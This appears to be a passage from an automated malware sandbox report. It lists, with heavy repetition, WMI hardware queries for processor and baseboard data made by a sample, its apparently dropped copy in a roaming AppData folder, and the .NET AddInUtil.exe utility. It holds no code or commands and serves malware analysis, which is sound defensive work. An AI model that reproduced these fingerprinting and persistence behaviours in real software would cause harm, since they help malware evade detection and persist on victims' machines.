Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
